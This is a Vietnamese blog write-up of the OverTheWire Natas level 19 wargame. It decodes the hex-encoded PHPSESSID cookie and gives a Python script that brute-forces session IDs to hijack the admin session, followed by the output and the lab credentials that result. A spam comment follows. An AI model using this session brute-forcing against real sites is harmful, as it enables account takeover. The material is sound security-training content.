by

[OverTheWire] Natas – Level 19

http://natas19.natas.labs.overthewire.org/

This page uses mostly the same code as the previous level, but session IDs are no longer sequential…

Please login with your admin account to retrieve credentials for natas20.

Không có View sourcecode, tuy nhiên dựa vào lời tựa, ta có thể hiểu là nó cũng tương tự bài 18, chỉ khác là giá trị của PHPSESSID sẽ không còn đơn giản nữa.

Thử login với:

username:password = yeuchimse:123456

Kiểm tra cookie:

PHPSESSID=3334332d7965756368696d7365

Khá giống một xâu HEX, decode:

343-yeuchimse

Đơn giản đến không ngờ. Như vậy ta chỉ cần dò giống hệt bài trước, khác mỗi cái cơ chế encode của biến PHPSESSID:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
import urllib, urllib2
def get_url_content(url, cookie, post_data):
if (post_data != None):
req = urllib2.Request(url, urllib.urlencode(post_data))
else:
req = urllib2.Request(url)
 
req.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20130606 Firefox/24.0')
 
if (cookie != None):
req.add_header('Cookie', cookie)
if (post_data != None):
req.add_header('Content-type', 'application/x-www-form-urlencoded')
 
source = urllib2.urlopen(req).read()
return source
 
passman = urllib2.HTTPPasswordMgrWithDefaultRealm()
passman.add_password(None, "http://natas19.natas.labs.overthewire.org/index.php?debug", 'natas19', '4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs')
urllib2.install_opener(urllib2.build_opener(urllib2.HTTPBasicAuthHandler(passman)))
 
for i in range(640):
hex_str = ''
for c in str(i):
hex_str += str(int(c) + 30)
ssid = '%s2d61646d696e' % hex_str
cookie = '__utma=176859643.181140426.1376493275.1376510682.1376530453.7; __utmz=176859643.1376493275.1.1.utmcsr=facebook.com|utmccn=(referral)|utmcmd=referral|utmcct=/l.php; PHPSESSID=%s' % ssid
source = get_url_content('http://natas19.natas.labs.overthewire.org/index.php?debug', cookie, None)
source = source.split('<div id="content">')[1].split('</div>')[0]
print 'id: %s' % i, ';', 'ssid: %s' % ssid
print source
 
if ('You are an admin' in source):
break

Kết quả là ta tìm được admin tại id = 176

1
2
3
4
5
6
7
8
9
id: 176 ; ssid: 3137362d61646d696e
 
<p>
<b>
This page uses mostly the same code as the previous level, but session IDs are no longer sequential...
</b>
</p>
DEBUG: Session start ok<br />You are an admin. The credentials for the next level are:<br /><pre>Username: natas20
Password: eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF</pre>

→ flag = eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF.

One thought on “[OverTheWire] Natas – Level 19

  1. ArnoldSmall says:
    10/12/2017 at 10:35

    I have checked your site and i have found some duplicate content, that’s why you don’t
    rank high in google, but there is a tool that can help you
    to create 100% unique content, search for: Boorfe’s
    tips unlimited content

    Reply

Leave a Reply

Your email address will not be published. Required fields are marked *